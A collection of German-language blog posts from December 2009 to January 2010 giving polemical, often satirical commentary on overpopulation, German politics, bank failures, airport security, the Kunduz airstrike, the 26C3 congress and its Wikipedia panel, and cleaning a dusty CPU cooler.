Wir haben da ein großes gesellschaftliches Stigma draus gemacht, aber im Grund wissen wir alle, dass Überbevölkerung unser größtes Problem ist, und das sieht man an unserer Politik. Wir grenzen die Armen aus und verarmen sie gezielt, damit sie sich bloß nicht mehr als das statistische Mittel fortpflanzen. Auf der anderen Seite wollen wir auch nicht, dass sie aussterben, weil wir sonst nicht weiter auf ihre Kosten leben können. Oder nehmt unseren Umgang mit der 3. Welt. Unsere Entwicklungshilfe ist so designed, dass sie nur uns selbst hilft. Unsere Kleiderspenden zerstören den Markt für die Textilproduktion in Afrika. Unsere Lebensmittelspenden dienen dazu, unsere Lagerkosten für subventionierte Massenproduktion von Lebensmitteln (den "Butterberg") zu verringern, und sind so billig, dass die Bauern in Afrika nicht konkurrieren können. Wir halten die in Abhängigkeit und Not und Elend, damit sie sich nicht vermehren. Die, bei denen das nicht klappt, sind Indien und China. Bei den Post-Mortem-Analysen des Kabals wäre ich ja gerne Fliege an der Wand, wenn die diskutieren, warum sie China und Indien so verkackt haben in ihren geopolitischen Strategien.
Aber machen wir uns nichts vor, Armut, Not und Elend ist evolutionär Teil des Kreislaufs. Menschen (und Tiere) vermehren sich, wenn es ihnen gut geht. Bis Armut, Not und Elend überhand nehmen. Die Menschheit hat sehr erfolgreich solange Not und Elend bekämpft, und damit die Vermehrung der Menschheit angefeuert, bis die nächste Iteration von Not und Elend durch die schiere Masse an Menschen ausgelöst wird. Da helfen jetzt auch keine technischen Tricks, mit Kondome Verteilen kriegt man die Überbevölkerung nicht weg.
Das ist meiner Ansicht nach das einzige Problem, das wirklich wichtig ist. Wenn wir uns nicht darum kümmern, wird die Natur das Problem für uns lösen. Mit Krankheiten, Naturkatastrophen, oder durch unsere eigene Dämlichkeit, mit einem Krieg oder einer versehentlich verbreiteten Biowaffe oder so. Die Arroganz, mit der wir andere Spezies zur Jagd freigeben, weil sie durch Überbevölkerung das Ökosystem gefährden, … die Argumentation greift auch gegen die größte Gefahr für das Ökosystem: uns.
Update: Übrigens, der Vollständigkeit halber: die Gegentheorie ist, dass die Überbevölkerung sich selbst reduziert, wenn nur alle im Wohlstand leben. Ich halte das aus zwei Gründen für eine Nebelkerze. Erstens haben wir die Grenze für "wir können alle Menschen auf dem Planeten ernähren" überschritten. Nicht nur die Grenze für "wir können allen Wohlstand bieten". Wir haben nicht mal genug Nahrung für alle, selbst wenn wir gerecht verteilen würden. Wohlstand für alle ist eine Illusion. Und das ist schon unter der Annahme, dass Wohlstand sich universell definiert, was ich auch für nicht glaubwürdig halte.
Update: Zwei Anmerkungen. Erstens hat mir jemand Zahlen gezeigt, nach denen die Nahrung doch reichen würde für alle. Erstens wäre das diese Grafik und der Brennwert von Weizen von hier. OK. Dazu merke ich an, dass das nicht nachhaltig ist, sondern durch Dünger so ein hoher Ertrag produziert wird, und Dünger ist kein nachwachsender Rohstoff. Außerdem muss der Kram ja zum Verbraucher gekarrt werden, was wir auch mit nicht nachwachsenden Rohstoffen (Öl) machen. Die zweite Anmerkung ist, dass die Ressourcen krass ungleichmäßig verteilt werden. Stimmt. Ich schlage auch nicht vor, die ganzen Armen zu töten bzw verhungern zu lassen, auf dass wir beliebig weiter Ressourcen verschwenden können. Aber über kurz oder lang müssen wir die Bevölkerungsexplosion rational diskutieren, bzw überhaupt mal diskutieren.
Update: Siehe auch das Voluntary Human Extinction Movement :-)

Sun Jan 24 2010

[l] Neues Produkt für den Kampf gegen den islamistischen Terror: Waffenöl mit Schweinefettanteil, damit die Terroristen nicht in den Himmel kommen. Die Idee ist nicht neu, aber die Seite von damals ist inzwischen 404.
Update: Die Briten haben das 1857 auch mal gemacht:
Innerhalb der britisch-indischen Streitkräfte war spätestens ab Januar 1857 weitläufig das Gerücht verbreitet, die Patronen seien mit einer Mischung aus Rindertalg und Schweineschmalz behandelt worden. Gläubigen Hindus und Moslems musste dies gleichermaßen als schwerer Affront erscheinen.
(Danke, Reinhard)

Thu Jan 21 2010

[l] Sehr schöne Adbusting-Aktion, und auch noch zu Lasten der Schwarzen Pest, da muss ich ja drauf linken! :-)
Ursprünglich war das glaube ich mal Werbung für eine Jobbörse oder so. Keine Ahnung, ob die wirklich irgendwo so aushängen oder ob das ein Photoshop ist. Ich habe auch keine echte Quelle dafür, aber mir hat jemand noch drei weitere zugemailt. 1 2 3 4 5. Sachdienliche Hinweise nehme ich gerne entgegen.
Update: Hier gibt es eine russische Version mit noch ein paar mehr Motiven.
Update: Hier die Originale. Da da die selben Leute mit den Geräten interagieren, ist das wohl ein Photoshop.

Wed Jan 20 2010

[l] Lacher des Tages: Die Bahn hat plötzlich Finanzlücken und kann den Streckenausbau nicht finanzieren. Also erstmal: Streckenausbau? Bei der Bahn? HAHAHAHAHA. Zweitens hat die Bahn gerade eine Milliarde Gewinn gemacht, indem sie die Züge kaputtgespart haben. Wahrscheinlich haben sie das schon als Boni an das Management ausgeschüttet und können deshalb jetzt keinen "Ausbau" finanzieren.

Tue Jan 19 2010

[l] Wisst ihr, wie man in Berlin dafür sorgt, dass die Straßen vom Schnee befreit werden? Man lädt Netanjahu zu Besuch ein. Dann geht das plötzlich.
Auf Netanjahus Route ist hingegen der Frühling eingekehrt. "Aus Sicherheitsgründen", sagt Bernd Müller, Sprecher der Berliner Stadtreinigungsbetriebe (BSR). "Wir haben von der Polizei den Autrag bekommen, den gesamten Schnee abzufahren." Der türmt sich nun auf den Parkplätzen in der Innenstadt.
*facepalm*
Das war dann wohl auch der Grund, wieso ein Polizeiboot (!) auf der ansonsten mit schwimmenden Eisschollen gefüllten Spree rumgondelte. Da hätte ja ein Terrorist lang schwimmen können!1!! Gut, weit wäre der nicht gekommen, aber versuchen hätte es einer können!
Spaß kann man an der Stelle auch mit der Berliner Schnauze haben:
Mehrere hundert LKW-Ladungen Schnee habe man abtransportiert. "Dat is ja een Uffriss wie bei Honecker". Vor Auftritten des einstigen DDR-Staatsratsvorsitzenden wurden regelmäßig die Straßen poliert. Ein anderer BSR-Kollege findet indes: Ganz so schlimm sei es nun nicht. Bei einem Auftritt von Honecker wäre nicht nur der Schnee weggeräumt worden. "Da wären die braunen Pflanzen auch noch grün angemalt worden."
Muhahahaha

Mon Jan 18 2010

[l] Gerücht des Tages: Seehofer möchte von Bushido eine Wahlkampfhymne gemacht haben. Hach liegen mir da gerade Dinge von kriminellen Vereinigungen und Gangsta-Rappern auf der Zunge, aber das wäre ungehörig. Stattdessen sollten wir uns alle freuen, dass die CSU sich plötzlich für Kulturförderung interessiert. Vielleicht wird das ja doch noch was mit der Kulturflatrate.
Update: Bushido passt auch aus anderen Gründen perfekt zur CSU. Und wem das immer noch nicht reicht, für den habe ich das hier. (Danke, Thomas)

Fri Jan 15 2010

[l] Hahaha wie peinlich, die Chinesen haben Google ausgerechnet über einen IE-0day aufgemacht. Als ob die keinen eigenen Browser hätten.
Update: Kriege gerade eine Mail mit einem Screenshot eines Chrome 0day :-)

Tue Jan 12 2010

[l] Lacher des Tages: Das Hadopi-Logo ist mit einer raubkopierten Font gemacht. Die müssten sich also selber vom Internet trennen jetzt.
Und die Mannheimer Polizei sollten sie auch gleich mittrennen.
[l] In Holland gab es eine größere Bankenpleite, weil die Vereinigung geschädigter Kunden im Fernsehen dazu aufrief, dass die Leute alle ihr Geld von der Bank abziehen, was die auch gemacht haben. Das waren über Nacht so 600 Millionen Euro. Das hat die Bank zerlegt. Die Zentralbank hat sie jetzt übernommen. (Die Meldung ist schon vom Oktober 2009)

Fri Jan 8 2010

[l] Habt ihr das mitgekriegt, wie sie diese Tage Israelis gefragt haben, wie die das mit ihrer Flughafensicherheit machen, dass bei denen sowas nicht passiert, und wieso die keine Nacktscanner haben? Und die Israelis haben dann einen auf dicke Hose gemacht, sie bräuchten sowas nicht, sie müssten nur den Passagieren ins Auge gucken und ein paar Fragen stellen, und dann sei alles klar? Ich finde die URL gerade nicht wieder. Nun, das war gestern.
Heute hört sich das schon wieder ganz anders an. Heute ist die Rede von Gedankenlese-Geräten und "harten Befragungen". Oh und der Ben-Gurion-Flughafen eröffnet ein fettes Biometrie-System.
In the first stage, passengers will arrive at a registration desk, where a machine will scan their passports, and take fingerprint and facial imaging samples to create a biometric signature.
Spannenderweise wollen sie das nicht in einer zentralen Datenbank speichern, sondern auf einer Smartcard, die sie dem Passagier geben. Die sind da also schon mal weiter als wir.
Aber die Befragung mit der Körpersprache und so weiter, das wird jetzt automatisiert:
As the computer confirms a biometric match, a touch screen panel will present the passengers with a series of security questions that until now were asked by airport personnel.
[…]
"If any of the questions receive incorrect answers, or the system reports a problem, passengers will be taken aside by a guard for an in-depth check, before being allowed to proceed."
Das ist ja schonmal spannend. Das können ja keine besonders harten Fragen gewesen sein, wenn ein Computer prüfen kann, ob die Antwort richtig ist oder nicht. Insbesondere die Klassiker "warum kommen Sie in unser Land" und "wohin wollen Sie weiterreisen" fallen damit schonmal aus.
Update: Ein aufmerksamer Leser hat die URL für mich gefunden. (Danke, Tim)

Thu Jan 7 2010

[l] Die CDU beginnt dann mit ihrem Versuch, die Privatkopie zu entkernen.
„Die Privatkopie soll zulässig bleiben, wenn man nachweisen kann, dass Kopien für den engeren Familienkreis und Privatgebrauch gemacht werden. Deshalb dürfen 10 Kopien nicht überschritten werden.
Wer hat die noch gleich gewählt? Money Quote:
„In einigen Bereichen gibt es auch Differenzen zwischen uns und unserem Koalitionspartner der FDP. Beispiel Internet: größtmögliche Freiheit bei der FDP, während für die CDU das Internet kein rechtsfreier Raum sein kann.“
Harharhar
Update: Mir stellt sich gerade die Frage, ob das auch eine Beweislastumkehr ist. Wie ist denn das im Moment, wenn man eine Privatkopie macht und deshalb eine Staatsanwaltschaft ermittelt? Müssen die dann nachweisen, dass es keine Privatkopie war, oder muss ich dann nachweisen, dass es eine war? Ich vermute ersteres, bin mir aber nicht sicher. (Danke, schmonck)
[l] Das wird euch jetzt sicher genau so schockieren wie mich: Berlin kann das Wasserwerk nicht verstaatlichen, weil RWE und Veolia ihre Anteile nicht rausrücken wollen. Also DAMIT konnte ja wohl NIEMAND rechnen!1!!
Aber hey, Operation erfolgreich, Patient tot. Die Privatisierung hat eine frühere Regierung gemacht, und die muss den Ärger jetzt nicht ausbaden. Genau so funktioniert unser System, und solange wir das nicht ändern, wird es auch so bleiben.

Sun Jan 3 2010

[l] Kurzer Programmhinweis: am 5.1. (übermorgen!) im DLF, um 19:15, eine Sendung von der immer wieder empfehlenswerten Gaby Weber, unter dem Titel "Im Wegschauen vereint — Wie west- und ostdeutsche Diplomaten den argentinischen Diktatoren halfen". Hier ist der Teaser:
Während der argentinischen Militärdiktatur (1976 bis 1983) hat sich die bundesdeutsche Diplomatie wenig an den Menschenrechtsverletzungen gestört. Autos, Atomkraftwerke, Telefone und U-Boote sollten an die Argentinier verkauft werden. Da waren Nachfragen, was die Soldaten mit den verschleppten Deutschen gemacht haben, geschäftsschädigend.
Jetzt sind die Akten des Auswärtigen Amts auf Initiative der "Koalition gegen Straflosigkeit" aufgearbeitet worden. Hat man daraus gelernt?
Weitgehend unbeachtet ist die Frage, wie sich die ostdeutsche Außenpolitik damals verhalten hat. Zwar brüsten sich ehemalige MfS-Offiziere in ihren Memoiren mit Heldentaten für den Aufbau des Sozialismus in der Dritten Welt, doch das Thema Argentinien wird vornehm übergangen. Dabei finden sich in der Birthler-Behörde interessante Dokumente über Waffengeschäfte Ostberlins und über das systematische Wegschauen bei den Menschenrechten. Das Hinsehen wäre wohl auch geschäftsschädigend gewesen.
Viel Spaß beim Hören!

Wed Dec 30 2009

[l] So, der Congress ist fertig, und außer dem Wikipedia-Podium und den Security Nightmares habe ich heute auch nichts weiter mitgekriegt, habe den Rest des Tages schön mit Socializen verbracht. Das Wikipedia-Podium lief ungefähr so, wie es zu erwarten war. Von Seiten des CCC ging es darum, das Thema mit Öffentlichkeit und Publikumsinvolvierung anzusprechen, und zu zeigen, dass es uns nicht ums Bashen geht, sondern um Verbesserungen und dass wir auch konkrete Vorschläge haben. Wir hatten Maha aufs Podium gesetzt als Liaison, weil er sowohl im Club als auch der Wikipedia zuhause ist. Moderator war Andreas Bogk, der sich auch schön zurückgehalten hat und keine Agenda gepusht hat. Dann saß da noch Scytale und hat sein Levitation-Projekt hochgehalten und mit Maha den Kritiker-Teil übernommen und seine Vision für die Wikipedia der Zukunft vorgestellt. Die anderen beiden Podiumsteilnehmer kamen beide von Wikimedia (im Fall von Kurt nur früher, der macht inzwischen auch andere Dinge), einmal Kurt Jansson als Vertreter der Exkludisten (er war in der Diskussion bisher vor allem dadurch aufgefallen, dass er bei dem Wikimedia-Treffen in Berlin im November die Position "Krise? Welche Krise?" vertreten hatte) und Mathias Schindler als Vertreter der Inkludisten. Mathias ist die treibende Kraft hinter der Befreiung von Bildern von der Deutschen Fotothek und dem Bundesarchiv.
Ich wollte ja ursprünglich Moderator sein, aber aus NPOV-Gründen haben wir das lieber den Andreas machen lassen, aber ich habe mich dann in die Veranstaltung reingehackt und saß neben dem Podium ohne Mikrofon auf einem Sofa. Eigentlich hatte ich da einen Freud-Ohrensessel haben wollen, aber den haben wir nicht organisiert gekriegt. Ich wollte noch Kristian Köhntopp auf das Sofa setzen, aber der kam nicht (ich gratuliere übrigens herzlich). Ich habe auch verpeilt, da mit einer Packung Popcorn anzukommen, und so war ich im Wesentlichen auf ein gelegentliches Facepalm reduziert, habe aber über Kurts Mikro einmal in der Mitte und einmal am Ende etwas eingeworfen.
Inhaltlich gab es dann natürlich doch viel Bashing. Das Publikum schien mir teilweise extra dafür angereist, um mal dem Saal erzählen zu können, wie ihnen auch der erste Artikel erstmal gelöscht wurde und dass sie seitdem keinen Bock mehr haben. Insbesondere ein Teilnehmer war ausgesprochen verärgert, dass aus dem Artikel zu Jörg Schönbohm eine umfangreiche Liste von grenzwertigen "nationalkonservativen" Äußerungen entfernt worden seien, wie sich denn das mit dem immer hochgehaltenen NPOV vereinbaren ließe, und dass das seiner Meinung nach eine faule Ausrede sei und alle Moderationen oder Zensurmaßnahmen letzlich politisch seien.
Sinn von so einem Podium ist ähnlich eines Interviews natürlich auch immer, Leute zu entlarvenden Aussagen zu verleiten. Bei dem Wikipedia-Podium waren die entlarvensten Äußerungen meiner Ansicht nach die folgenden:
1. Auf den Vorschlag hin, die User die Artikelqualität und -relevanz beurteilen zu lassen, z.B. mit einem Amazon-ähnlichen Fünf-Sterne-System, entgegnete Kurt Jansson, dann würde ein Pokemon-Artikel sicher auch durchkommen, und er sagte das, als sei damit der Vorschlag offensichtlich vollständig ad absurdum geführt. Die Idee, dass vielleicht jemand einen Pokemon-Artikel für sinnvoll halten oder gar aktiv suchen und einen Nutzen daraus ziehen könnte, war für ihn so abseitig, dass er da gar nicht drauf gekommen ist.
  An der Stelle hat man gut gesehen, dass hinter der ganzen Rhetorik von wegen "Qualitätssicherung" und "Relevanz" doch immer nur steckt, das eigene Weltbild dem Rest aufzudrücken.
2. Mathias fing an der einen Stelle plötzlich an, dass die Leute ja gerne versuchen würden, die Realität zu verändern, indem sie in der Wikipedia die Fakten ändern, quasi die Wikipedia als Realitäts-Editor. Fand ich eine charmante Idee, bis er ausführte, dass er damit die "Zensursula" und "Mogis"-Debatte meinte. Man könne die Zensursula-Sache nicht in der Wikipedia mit einem Editor für wichtig erklären (ich paraphrasiere jetzt hier brutal, wie seine Aussage bei mir ankam), sondern man müsse da in der realen Welt dafür sorgen, dass das wichtig sei, und dann käme das von alleine in der Wikipedia an. Bei der Wikipedia kam das also zumindest partiell so an, als würden wir unsere Mahnwachen bei ihnen reineditieren, um sie der Presse gegenüber als wichtiger darzustellen als sie eigentlich sind.
  An dieser Stelle ist das Podium schon ein Erfolg gewesen für mich, denn nur wenn man diese Art von anderer Perspektive versteht, kann man die daraus resultierenden Aktionen verstehen und sinnvoll diskutieren.
3. Kurt kam mehrfach mit dem "na wenn es euch nicht gefällt, dann forkt halt" Holzhammer. In einem Podium über die Zukunft der Wikipedia kommt das einer Bankrotterklärung gleich.
4. Mathias relativierte dann noch die Löschung von Details wie dem "Zensursula"-Lemma aus der Netzzensur-Debatte damit, dass da ja an anderer Stelle in der Wikipedia schon die Debatte an sich erwähnt würde, und da ja nicht alles wegzensiert worden sei. Angesichts systematischen Entfernens von Verweisen auf Mogis aus diversen Artikeln hat das Argument bei mir und anderen Beobachtern nur noch ungläubiges Staunen ausgelöst.
Nachher fallen einem natürlich immer noch mehr Dinge ein, die angesprochen gehört hätten, aber unter dem Strich ist das glaube ich ganz gut gelaufen. Ich habe jedenfalls neue Einsichten gewonnen.
Update: Oh, ein Highlight möchte ich noch erwähnen. Kurt argumentierte an einer Stelle, man würde ja fürs Kochen nicht die Wikipedia konsultieren. Daraufhin meinte einer aus dem Publikum, gerade beim Kochen sei es wichtig, dass man freie Inhalte haben könne für seine Rezepte und Lebensmittelfotos. Falls diese Anspielung für jemanden zu subtil war: mit Abmahnungen zu Lebensmittelfotos bestreiten im Internet einige Abmahner ihren Lebensunterhalt (oder könnten von der gefühlten Menge des abgemahnten Geldes her; wer weiß, vielleicht haben die ja auch Nebenjobs).
Update: Mathias Schindler weist darauf hin, dass für freie Fotos von Essen Wikimedia Commons zuständig ist und für Kochbücher Wikibooks.
Update: Kurt Jansson schickt mir gerade folgende Klarstellung:
Was ich gesagt habe ist, dass ein Pokemon-Artikel immer 5 Sterne hätte, egal wie gut oder schlecht er ist. Oder noch deutlicher: Sobald wir das einführen wird es in den Naziforen Aufrufe geben, bestimmte Versionen des Artikels "Holocaustleugnung" hoch zu bewerten, den Artikel zur "taz" hingegen runterzuwerten, egal wie der gerade ausschaut.
Das hatte ich offensichtlich falsch verstanden.

Sun Dec 27 2009

[l] Der 26c3 rockt bisher tierisch. Ich habe bisher die Keynote gesehen, dann den Wikileaks-Vortrag, und den Breaking Crypto through Reverse Engineering Vortrag, die waren alle super. Dazwischen habe ich Folien gebastelt und höre jetzt gerade, dass es von dem Wikipedia-Vortrag von HaeB keine Videoaufzeichnung gibt, weil HaeB das nicht wollte. Das ist natürlich eine ganz große Scheiße, weil ich mich fest darauf verlassen hatte, mir das per Video anzugucken später. Saal 2 und 3 probiere ich in der Praxis kaum noch, da überhaupt reinzukommen, weil die immer so voll sind (sind eher kleinere Säle).
Insgesamt ging der Tag schon krass los, die Tickets waren schon eine Stunde vor der Keynote ausverkauft. Die ganzen findigen Nerds waren schon gestern angereist und hatten stundenlang angestanden, um sich ein Ticket zu sichern. Heute haben wohl einige Leute in die Röhre geguckt und kamen nicht rein. Das ist natürlich alles sehr unbefriedigend für uns, aber es gibt in Berlin schlicht keine größeren in Frage kommenden Veranstaltungsorte ausser dem ICC, und mit den Leuten von der Messe Berlin will keiner wirklich reden, weil die komische Vorstellungen haben wie "dann müsst ihr auch das Internet, die Verpflegung und die Garderobe von uns kaufen". So werden wir wohl auch in Zukunft mit dem bcc leben müssen, auch wenn es zu klein ist.
Ich werde mal anregen, dass wir nächstes Jahr auch ein Dragons Everywhere mit den Berliner Unis machen, damit niemand ganz nach Hause gehen muss, weil er nicht reinkam.
Das Internet ist den ganzen Tag schon eher flaky, was angesichts unserer Streaming-Versprechen natürlich besonders ärgerlich ist. Das liegt daran, dass wir die Hardware für Router und Switches immer leihen müssen, und die erst kurz vorher kriegen, und da schon auch mal was kaputt ist oder geht und wir dann Teile tauschen müssen. Insofern können wir da auch nicht so viel gegen tun, außer uns für die Unannehmlichkeiten zu entschuldigen.
Der Wikileaks-Vortrag war ganz großes Kino, übrigens. Zieht euch den mal als Video, wenn ihr den nicht live geguckt habt. Die haben ihr Projekt vorgestellt, in Island eine Art Offshore-Publishing-Center aufzubauen als Gegenposition zum Offshore-Banking. Island hat gerade von Banking die Schnauze voll und die kennen alle Wikileaks, weil Wikileaks die Liste der Leute geleakt hatte, die sich mit ihrem Geld aus dem Staub gemacht haben. Da gab es eine lustige Geschichte zu, dass das staatliche Fernsehen Islands das als 8-Uhr-Nachrichten bringen wollte, aber eine einstweilige Verfügung kassiert haben, dass sie das nicht bringen dürfen. Also haben die gesagt, das wäre unser Thema gewesen, wir haben auch nichts anderes vorbereitet, also hier ist die URL bei Wikileaks, guckt euch das halt selber an. Seit dem kennt jeder in Island Wikileaks und die sind auch in der Laune gerade, mal den anderen Ländern den Mittelfinger zu zeigen und die Wikileaks-Leute waren da mal in ein Fernseh-Interview eingeladen, und haben die Idee eben live im Fernsehen angesprochen, und da echt eine Welle losgetreten mit der Idee. Wenn das klappt, wäre das ein großer Schritt für Wikileaks, die Pressefreiheit und Menschenreche.
Am Ende hat Wikileaks standing ovations gekriegt.

Wed Dec 23 2009

[l] Oh Mann. Ich hatte ja hier schon mal vorgeschlagen, den Rechner ab und zu mal mit einem Staubsauger zu bearbeiten, weil der Staub sonst die Kühlperformance beeinträchtigt. Mein Desktop hat seit einer Weile nervige Überhitzungserscheinungen gezeigt, die CPU hat dauernd den Not-Stopp aktiviert, das war wir mit angezogener Handbremse fahren. Ich habe einen Core i7 920 mit dem mitgelieferten Kühler von Intel, der als nicht so schlecht gilt. Das Design dieses Kühlers ist ein Radial-Kühlkörper mit nach außen auffächernden Lamellen und ein Lüfter obendrauf, der Luft nach unten bläst. Nun habe ich immer schön mit dem Staubsauger die Gehäuselüfter und jeweils den Grill davor entstaubt, und bei der CPU von der Seite die Lamellen staubgesaugt, aber es hat nichts geholfen. Ich dachte schon, ich hätte versehentlich die Stromversorgung (über die auch die Drehgeschwindigkeit reguliert wird) an den Stecker für den Gehäuselüfter angeschlossen oder das Wärmeleitpad ist schlecht, aber bei näherer Betrachtung war das Problem ein anderes: der Staub hatte sich zwischen Lüfter und Lamellen festgestampft. Da ich nur von der Seite gesaugt habe, habe ich das Problem eher noch schlimmer gemacht. Am Ende hat der Lüfter schlicht keine Luft mehr zu den Lamellen durchgekriegt. Ich habe also heute mal von oben gesaugt, bis man die Lamellen wieder sehen konnte, und die Ruhetemperatur ist von 70 auf 44 °C runter. Bei einem Video-Encoden auf allen Cores gerät er immer noch an seine Throttling-Grenze und logt mir einen "zu heiß" MCE, insofern muss ich da immer noch überlegen, ob ich nicht den Kühler nochmal abbaue und die Pads durch Leitpaste ersetze, aber im Großen und Ganzen kann ich jetzt wieder arbeiten. Die mencoder-Framerate ist von 20 auf 48 hochgegangen.
Insofern wiederhole ich nochmal meinen Rat von früher: immer schön staubsaugen, auch im Gehäuse. Lohnt sich auch bei der Grafikkarte. Und der Hinweis mit dem "Lüfter mit Bleistift fixieren beim Saugen, da er sonst Strom erzeugt und was kaputt machen könnte" von letztem Mal gilt natürlich weiterhin.

Thu Dec 17 2009

[l] Matt Blaze hat sich mal ein Titan-Raketensilo aus dem Kalten Krieg angeguckt und analysiert das aus der Perspektive eines Security-Forschers. Das ist eine sehr spannende Sache und er hat auch lauter spannende Fotos gemacht.
[l] Ihr werdet es vielleicht schon gehört haben: Die US-Drohnen in Afghanistan senden ihren Videofeed unverschlüsselt raus. Und die fiesen Aufständischen gucken sich jetzt die Feeds live auf ihren Computern an.
Das Krasse an der Meldung ist, dass wir damit schriftlich haben, dass sie bisher genau Null echte Aufständische plattgemacht haben mit den Drohnen, immer nur Unschuldige. Die Vermutung lag ja schon länger nahe, wenn man mal nachzählt, wie oft sie "die Rechte Hand von Osama bin Laden" mit einer Drohne erlegt haben wollen, und nachdem sie ein ganzes geplättetes Dorf rückwirkend zu Aufständischen umdeklariert haben, oder die Zivilisten mit dem Tanklastzug, das waren ja auch alles Aufständische!1!!

Thu Dec 10 2009

[l] Erinnert ihr euch an diesen bombardierten Tanklaster in Afghanistan? Nach langem hin- und her und einer erschütternd schlechten Krisen-PR haben sie eingesehen, dass sie sich da nicht herauswinden können, und haben das dem Oberst Klein in die Schuhe geschoben.
Allerdings ist das Problem bei Krisen-PR, dass man damit auch die eigenen Leute verwirrt, und die sich nicht mehr sicher sind, ob das jetzt ein glorreicher Sieg oder ein katastrophales Versagen war, und so passiert gerade, was man sonst nur bei glorreichen Siegen erlebt, nämlich dass noch mehr als einer Schuld war:
Den Unterlagen zufolge war damit neben dem kommandierenden Bundeswehr-Oberst Georg Klein unter anderem nicht nur ein Berater im Rang eines Feldwebels vom Kommando Spezialkräfte KSK, sondern auch der mit der Terroristenbekämpfung befasste BND direkt eingeschaltet.
Ach was. Sagen Sie bloß. Na dann bin ich ja wirklich gewillt, mir die Lage anders vorzustellen, nämlich dass die Spezialsonderfachexperten von der KSK und dem BND dem Oberst da Druck gemacht haben, er solle endlich ihre großartige Intelligence in Aktionismus umsetzen.
Hier ist der Link zu der zitierten Presseerklärung, keine Ahnung, wie lange der hält.
[l] Es zeichnet sich schon länger ab, dass Österreich ein Problem mit ihren Investitionen im Ostblock hat. Jetzt scheint es die erste Großbank zu erwischen: Die Hypo Alpe Adria steht offenbar kurz vor dem Platzen. Es ist jedenfalls so schlimm, dass die bayerischen Mehrheitseigentümer sich mal nach Bailout-Kohle umgeschaut haben, aber der bayerische Finanzminister hat direkt hysterisch abgewunken. Jetzt sei die Republik Österreich am Zug. Die Österreicher haben aber genug andere Sorgen und winken auch ab.
Unterdessen gerüchtet es im Internet, dass da schon der Bank Run im vollen Gange sei. Kann ich natürlich nicht prüfen, aber ich denke mal, das wird sich dann bis Anfang der nächsten Woche geklärt haben. Und dann werden wir vielleicht auch sehen, wie schlimm das für Osteuropa und den Balkan ist, wenn eine größere Österreichische Bank platzt.
Update: ich versuche gerade, mir das vorzustellen.
Bayern an Österreich: Hey! Psssst! Du da! Ja, du! Willst du nicht diese tolle Bank hier geschenkt haben?
Österreich an Bayern: BWAHAHAHAHAHA, nee, für euren Klärschlamm haftet ihr mal schön selber!
Oder so. Da wär ich ja gerne Fliege an der Wand gewesen.
Auf der anderen Seite schade, dass uns die Nigeria-Scammer unsere Geschäftsmodelle kaputtgemacht haben. "Isch 'abe ein paar Milliarden in dieser Bank in Österreich, die müssen wir nur noch außer Landes schaffen!" :-)
Update: Die Geschichte ist noch lustiger. Der Haider (ja, DER Haider!) hat die damals schon marode Hypo Alpe Adria an die BayernLB verkauft. 1,7 Milliarden Euro haben die Bayern gezahlt. Die haben sich da also mal ordentlich über den Tisch ziehen lassen. Über sechs Milliarden haben sie schon mit denen verloren. Der Haider hat damit seinen Wahlkampf finanziert. Jetzt sind die Österreicher gekommen und wollen auch noch, dass die Bayern ihnen ihren Bailout zahlen, und die Bayern haben abgewunken und gesagt, hey, von uns aus kann der Laden zumachen, und wenn die jemand rettet, dann ihr. Kommt, wir schenken euch den Laden auch.
Update: Und noch ein spannendes Detail: Der ehemalige BayernLB-Chef bekommt 50.000 Euro Beraterhonorar von der Hypo Alpe Adria. Aber das ist nicht anrüchig, neeeeiiiiin, weil (festhalten!):
Zu seinem Beratervertrag mit der Hypo Alpe Adria sagte Schmidt der SZ, "diese Angelegenheit kann nicht zwilichtig sein, weil die Beträge dafür viel zu lächerlich sind".
Und es wird noch viel zwielichtiger: Der damalige Chef der Hypo Alpe Adria, Tilo Berlin, hat das auf eigene Faust ausgezahlt. Er kannte Schmidt noch von der LBBW, wo sie zusammen tätig waren. Berlin hat eine Investorengruppe zusammengestellt, die 25% der Hypo Alpe Adria erwarb und bereits kurz darauf mit einem Gewinn zwischen 100 und 150 Millionen Euro an die BayernLB weiterverkaufte. Gut, dass bei uns Insidergeschäfte verboten sind, sonst könnte man fast denken, das sei eines gewesen.
Update: Die Bank soll nicht einfach nur verschenkt werden, Bayern würde sogar noch 400 Mio an Steuergeldern drauflegen.
[l] Was macht man als der Typ, der mit 35 Jahren für das Aufsetzen des TARP zuständig gemacht wird, dem 700-Milliarden-Bailout der Amis? Man wirft nach sieben Monaten hin und wird Einsiedler irgendwo im Wald. Mit schönen Bildern von seinem Holzhaus.
Update: Ach nee, krass, von wegen Einsiedler, der hat gerade bei Pimco (einer Allianz-Tochter) angefangen!

Wed Dec 9 2009

[l] Ist euch eigentlich mal aufgefallen, dass Deutschland das einzige Land in Europa ist, in dem die Kommunistische Partei verboten ist? Die Kommunisten? Ernsthaft? Ist das eine Gefahr für unsere Demokratie?
Ich wundere mich schon lange, dass das so ist. Wir haben das wahrscheinlich für die Amis gemacht, weil die eine irrationale Angst vor den Kommunisten aufgebaut hatten. Und wahrscheinlich können wir in gewisser Weise froh sein, dass die bei uns verboten sind, denn in Italien, wo die nicht verboten sind und deutlich mehr Einfluß haben, haben die Amis über die NATO Terroranschläge aufs eigene Volk durchführen lassen, um das den Kommunisten in die Schuhe schieben zu können. So gesehen hat uns das Verbot der ~~DKP~~ KPD vor Terroranschlägen beschützt.
Aber mal abgesehen davon… wieso haben wir das Verbot noch nicht wieder aufgehoben? Findet heute wirklich noch irgendjemand, dass von denen eine Gefahr ausgeht?
Vor allem wäre das taktisch ein brillianter Schachzug um die Linkspartei zu schwächen. Man sollte denken, dass Schwarz-Geld noch genügend viel Hirnschmalz zusammenkriegt, um das zu sehen. Und auch die Verräterpartei würde ihnen sicher gerne zur Seite stehen.
Nur mal so als Gedanke zur Nacht. Ich finde es eine Schande, dass wir die Kommunisten verboten haben. Insbesondere weil die NPD noch frei rumläuft, natürlich, aber auch unabhängig davon.
Update: Schaut euch mal dieses Blogposting bei woschod.de an. Anscheinend (mir völlig neu) gibt es eine KPD, die noch schnell 1990 in der DDR gegründet wurde, und dann dank Spezialstatus übernommen wurde. Es gibt also eine KPD. Und sie wird natürlich vom Verfassungsschutz beobachtet.

Tue Dec 8 2009

